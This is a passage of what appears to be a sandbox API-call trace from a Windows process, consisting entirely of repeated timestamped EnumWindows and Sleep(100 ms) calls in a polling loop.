(lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.174] Sleep (dwMilliseconds=0x64) [0147.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.176] Sleep (dwMilliseconds=0x64) [0147.177] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.178] Sleep (dwMilliseconds=0x64) [0147.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.179] Sleep (dwMilliseconds=0x64) [0147.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.181] Sleep (dwMilliseconds=0x64) [0147.182] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.182] Sleep (dwMilliseconds=0x64) [0147.184] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.184] Sleep (dwMilliseconds=0x64) [0147.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.186] Sleep (dwMilliseconds=0x64) [0147.187] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.187] Sleep (dwMilliseconds=0x64) [0147.188] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.189] Sleep (dwMilliseconds=0x64) [0147.190] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.190] Sleep (dwMilliseconds=0x64) [0147.191] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.191] Sleep (dwMilliseconds=0x64) [0147.193] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.193] Sleep (dwMilliseconds=0x64) [0147.194] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.195] Sleep (dwMilliseconds=0x64) [0147.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.196] Sleep (dwMilliseconds=0x64) [0147.197] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.197] Sleep (dwMilliseconds=0x64) [0147.200] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.200] Sleep (dwMilliseconds=0x64) [0147.201] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.201] Sleep (dwMilliseconds=0x64) [0147.204] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.204] Sleep (dwMilliseconds=0x64) [0147.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.206] Sleep (dwMilliseconds=0x64) [0147.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.208] Sleep (dwMilliseconds=0x64) [0147.209] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.210] Sleep (dwMilliseconds=0x64) [0147.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.213] Sleep (dwMilliseconds=0x64) [0147.215] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.215] Sleep (dwMilliseconds=0x64) [0147.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.218] Sleep (dwMilliseconds=0x64) [0147.219] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.220] Sleep (dwMilliseconds=0x64) [0147.222] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.222] Sleep (dwMilliseconds=0x64) [0147.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.224] Sleep (dwMilliseconds=0x64) [0147.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.233] Sleep (dwMilliseconds=0x64) [0147.235] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.235] Sleep (dwMilliseconds=0x64) [0147.253] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.253] Sleep (dwMilliseconds=0x64) [0147.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.254] Sleep (dwMilliseconds=0x64) [0147.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.256] Sleep (dwMilliseconds=0x64) [0147.257] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.257] Sleep (dwMilliseconds=0x64) [0147.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.259] Sleep (dwMilliseconds=0x64) [0147.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.261] Sleep (dwMilliseconds=0x64) [0147.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.262] Sleep (dwMilliseconds=0x64) [0147.264] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.264] Sleep (dwMilliseconds=0x64) [0147.266] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.266] Sleep (dwMilliseconds=0x64) [0147.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.268] Sleep (dwMilliseconds=0x64) [0147.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.269] Sleep (dwMilliseconds=0x64) [0147.271] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.271] Sleep (dwMilliseconds=0x64) [0147.273] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.273] Sleep (dwMilliseconds=0x64) [0147.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.275] Sleep (dwMilliseconds=0x64) [0147.277] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.277] Sleep (dwMilliseconds=0x64) [0147.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.278] Sleep (dwMilliseconds=0x64) [0147.280] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.280] Sleep (dwMilliseconds=0x64) [0147.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.282] Sleep (dwMilliseconds=0x64) [0147.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.284] Sleep (dwMilliseconds=0x64) [0147.285] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.285] Sleep (dwMilliseconds=0x64) [0147.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.292] Sleep (dwMilliseconds=0x64) [0147.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.293] Sleep (dwMilliseconds=0x64) [0147.295] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.295] Sleep (dwMilliseconds=0x64) [0147.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.297] Sleep (dwMilliseconds=0x64) [0147.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.298] Sleep (dwMilliseconds=0x64) [0147.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.301] Sleep (dwMilliseconds=0x64) [0147.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.345] Sleep (dwMilliseconds=0x64) [0147.399] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.399] Sleep (dwMilliseconds=0x64) [0147.421] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.421] Sleep (dwMilliseconds=0x64) [0147.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.486] Sleep (dwMilliseconds=0x64) [0147.495] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.495] Sleep (dwMilliseconds=0x64) [0147.547] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.548] Sleep (dwMilliseconds=0x64) [0147.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.678] Sleep (dwMilliseconds=0x64) [0147.771] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.772] Sleep (dwMilliseconds=0x64) [0147.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.789] Sleep (dwMilliseconds=0x64) [0147.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.825] Sleep (dwMilliseconds=0x64) [0147.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.879] Sleep (dwMilliseconds=0x64) [0147.920] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.920] Sleep (dwMilliseconds=0x64) [0148.137] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.138] Sleep (dwMilliseconds=0x64) [0148.219] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.219] Sleep (dwMilliseconds=0x64) [0148.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.279] Sleep (dwMilliseconds=0x64) [0148.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.326] Sleep (dwMilliseconds=0x64) [0148.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.376] Sleep (dwMilliseconds=0x64) [0148.454] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.454] Sleep (dwMilliseconds=0x64) [0148.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.534] Sleep (dwMilliseconds=0x64) [0148.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.598] Sleep (dwMilliseconds=0x64) [0148.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.642] Sleep (dwMilliseconds=0x64) [0148.682] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.682] Sleep (dwMilliseconds=0x64) [0148.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.795] Sleep (dwMilliseconds=0x64) [0148.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.876] Sleep (dwMilliseconds=0x64) [0148.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.897] Sleep (dwMilliseconds=0x64) [0148.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.921] Sleep (dwMilliseconds=0x64) [0148.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.924] Sleep (dwMilliseconds=0x64) [0148.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.931] Sleep (dwMilliseconds=0x64) [0148.933] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.934] Sleep (dwMilliseconds=0x64) [0148.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.938] Sleep (dwMilliseconds=0x64) [0148.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.942] Sleep (dwMilliseconds=0x64) [0148.943] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.944] Sleep (dwMilliseconds=0x64) [0148.947] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0148.948] Sleep (dwMilliseconds=0x64) [0149.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.066] Sleep (dwMilliseconds=0x64) [0149.144] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.145] Sleep (dwMilliseconds=0x64) [0149.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.207] Sleep (dwMilliseconds=0x64) [0149.220] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.224] Sleep (dwMilliseconds=0x64) [0149.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.292] Sleep (dwMilliseconds=0x64) [0149.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.328] Sleep (dwMilliseconds=0x64) [0149.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.385] Sleep (dwMilliseconds=0x64) [0149.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.476] Sleep (dwMilliseconds=0x64) [0149.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.518] Sleep (dwMilliseconds=0x64) [0149.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.589] Sleep (dwMilliseconds=0x64) [0149.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.666] Sleep (dwMilliseconds=0x64) [0149.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.741] Sleep (dwMilliseconds=0x64) [0149.810] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.810] Sleep (dwMilliseconds=0x64) [0149.848] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.848] Sleep (dwMilliseconds=0x64) [0149.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.886] Sleep (dwMilliseconds=0x64) [0149.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.889] Sleep (dwMilliseconds=0x64) [0149.912] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.918] Sleep (dwMilliseconds=0x64) [0149.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0149.984] Sleep (dwMilliseconds=0x64) [0150.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.055] Sleep (dwMilliseconds=0x64) [0150.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.106] Sleep (dwMilliseconds=0x64) [0150.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.135] Sleep (dwMilliseconds=0x64) [0150.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.147] Sleep (dwMilliseconds=0x64) [0150.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.151] Sleep (dwMilliseconds=0x64) [0150.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.158] Sleep (dwMilliseconds=0x64) [0150.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.185] Sleep (dwMilliseconds=0x64) [0150.191] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.191] Sleep (dwMilliseconds=0x64) [0150.193] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.219] Sleep (dwMilliseconds=0x64) [0150.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.263] Sleep (dwMilliseconds=0x64) [0150.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.334] Sleep (dwMilliseconds=0x64) [0150.394] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.394] Sleep (dwMilliseconds=0x64) [0150.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.432] Sleep (dwMilliseconds=0x64) [0150.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.482] Sleep (dwMilliseconds=0x64) [0150.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.521] Sleep (dwMilliseconds=0x64) [0150.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.569] Sleep (dwMilliseconds=0x64) [0150.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.643] Sleep (dwMilliseconds=0x64) [0150.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.694] Sleep (dwMilliseconds=0x64) [0150.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.729] Sleep (dwMilliseconds=0x64) [0150.763] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.764] Sleep (dwMilliseconds=0x64) [0150.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0150.856] Sleep (dwMilliseconds=0x64) [0150.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.031] Sleep (dwMilliseconds=0x64) [0151.111] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.112] Sleep (dwMilliseconds=0x64) [0151.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.159] Sleep (dwMilliseconds=0x64) [0151.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.213] Sleep (dwMilliseconds=0x64) [0151.255] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.255] Sleep (dwMilliseconds=0x64) [0151.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.328] Sleep (dwMilliseconds=0x64) [0151.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.404] Sleep (dwMilliseconds=0x64) [0151.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.463] Sleep (dwMilliseconds=0x64) [0151.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.550] Sleep (dwMilliseconds=0x64) [0151.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.655] Sleep (dwMilliseconds=0x64) [0151.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.742] Sleep (dwMilliseconds=0x64) [0151.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.757] Sleep (dwMilliseconds=0x64) [0151.769] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.772] Sleep (dwMilliseconds=0x64) [0151.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.781] Sleep (dwMilliseconds=0x64) [0151.784] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.802] Sleep (dwMilliseconds=0x64) [0151.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.899] Sleep (dwMilliseconds=0x64) [0151.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0151.977] Sleep (dwMilliseconds=0x64) [0152.076] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.076] Sleep (dwMilliseconds=0x64) [0152.133] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.133] Sleep (dwMilliseconds=0x64) [0152.173] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.174] Sleep (dwMilliseconds=0x64) [0152.214] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.215] Sleep (dwMilliseconds=0x64) [0152.253] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.277] Sleep (dwMilliseconds=0x64) [0152.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.342] Sleep (dwMilliseconds=0x64) [0152.384] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.384] Sleep (dwMilliseconds=0x64) [0152.386] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.386] Sleep (dwMilliseconds=0x64) [0152.388] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.389] Sleep (dwMilliseconds=0x64) [0152.390] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.390] Sleep (dwMilliseconds=0x64) [0152.391] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.392] Sleep (dwMilliseconds=0x64) [0152.393] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.393] Sleep (dwMilliseconds=0x64) [0152.394] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.395] Sleep (dwMilliseconds=0x64) [0152.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.396] Sleep (dwMilliseconds=0x64) [0152.397] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.402] Sleep (dwMilliseconds=0x64) [0152.404] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.404] Sleep (dwMilliseconds=0x64) [0152.405] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.405] Sleep (dwMilliseconds=0x64) [0152.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.407] Sleep (dwMilliseconds=0x64) [0152.408] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.408] Sleep (dwMilliseconds=0x64) [0152.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.410] Sleep (dwMilliseconds=0x64) [0152.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.411] Sleep (dwMilliseconds=0x64) [0152.413] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.413] Sleep (dwMilliseconds=0x64) [0152.415] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.415] Sleep (dwMilliseconds=0x64) [0152.417] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.417] Sleep (dwMilliseconds=0x64) [0152.419] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.419] Sleep (dwMilliseconds=0x64) [0152.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.420] Sleep (dwMilliseconds=0x64) [0152.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.422] Sleep (dwMilliseconds=0x64) [0152.423] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.423] Sleep (dwMilliseconds=0x64) [0152.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.425] Sleep (dwMilliseconds=0x64) [0152.426] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.426] Sleep (dwMilliseconds=0x64) [0152.428] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.428] Sleep (dwMilliseconds=0x64) [0152.429] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.429] Sleep (dwMilliseconds=0x64) [0152.431] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.431] Sleep (dwMilliseconds=0x64) [0152.432] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.432] Sleep (dwMilliseconds=0x64) [0152.434] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.434] Sleep (dwMilliseconds=0x64) [0152.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.435] Sleep (dwMilliseconds=0x64) [0152.441] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.441] Sleep (dwMilliseconds=0x64) [0152.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.442] Sleep (dwMilliseconds=0x64) [0152.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.444] Sleep (dwMilliseconds=0x64) [0152.446] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.446] Sleep (dwMilliseconds=0x64) [0152.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.448] Sleep (dwMilliseconds=0x64) [0152.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.449] Sleep (dwMilliseconds=0x64) [0152.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.451] Sleep (dwMilliseconds=0x64) [0152.452] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.452] Sleep (dwMilliseconds=0x64) [0152.454] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.454] Sleep (dwMilliseconds=0x64) [0152.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.456] Sleep (dwMilliseconds=0x64) [0152.457] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.458] Sleep (dwMilliseconds=0x64) [0152.459] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.460] Sleep (dwMilliseconds=0x64) [0152.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.461] Sleep (dwMilliseconds=0x64) [0152.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.463] Sleep (dwMilliseconds=0x64) [0152.464] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.464] Sleep (dwMilliseconds=0x64) [0152.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.466] Sleep (dwMilliseconds=0x64) [0152.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.467] Sleep (dwMilliseconds=0x64) [0152.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.469] Sleep (dwMilliseconds=0x64) [0152.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.470] Sleep (dwMilliseconds=0x64) [0152.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.472] Sleep (dwMilliseconds=0x64) [0152.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.473] Sleep (dwMilliseconds=0x64) [0152.479] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.480] Sleep (dwMilliseconds=0x64) [0152.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.481] Sleep (dwMilliseconds=0x64) [0152.483] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.483] Sleep (dwMilliseconds=0x64) [0152.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.521] Sleep (dwMilliseconds=0x64) [0152.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.563] Sleep (dwMilliseconds=0x64) [0152.580] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.580] Sleep (dwMilliseconds=0x64) [0152.582] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.582] Sleep (dwMilliseconds=0x64) [0152.583] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.584] Sleep (dwMilliseconds=0x64) [0152.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.585] Sleep (dwMilliseconds=0x64) [0152.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.587] Sleep (dwMilliseconds=0x64) [0152.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.588] Sleep (dwMilliseconds=0x64) [0152.589] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.590] Sleep (dwMilliseconds=0x64) [0152.591] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.591] Sleep (dwMilliseconds=0x64) [0152.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.593] Sleep (dwMilliseconds=0x64) [0152.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.596] Sleep (dwMilliseconds=0x64) [0152.603] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.604] Sleep (dwMilliseconds=0x64) [0152.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.606] Sleep (dwMilliseconds=0x64) [0152.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.608] Sleep (dwMilliseconds=0x64) [0152.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.614] Sleep (dwMilliseconds=0x64) [0152.616] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.616] Sleep (dwMilliseconds=0x64) [0152.637] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.638] Sleep (dwMilliseconds=0x64) [0152.639] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.640] Sleep (dwMilliseconds=0x64) [0152.646] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.646] Sleep (dwMilliseconds=0x64) [0152.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.648] Sleep (dwMilliseconds=0x64) [0152.649] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.649] Sleep (dwMilliseconds=0x64) [0152.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.650] Sleep (dwMilliseconds=0x64) [0152.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.652] Sleep (dwMilliseconds=0x64) [0152.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.654] Sleep (dwMilliseconds=0x64) [0152.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.667] Sleep (dwMilliseconds=0x64) [0152.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.670] Sleep (dwMilliseconds=0x64) [0152.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.672] Sleep (dwMilliseconds=0x64) [0152.674] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.676] Sleep (dwMilliseconds=0x64) [0152.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.678] Sleep (dwMilliseconds=0x64) [0152.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.727] Sleep (dwMilliseconds=0x64) [0152.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.817] Sleep (dwMilliseconds=0x64) [0152.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.850] Sleep (dwMilliseconds=0x64) [0152.852] EnumWindows 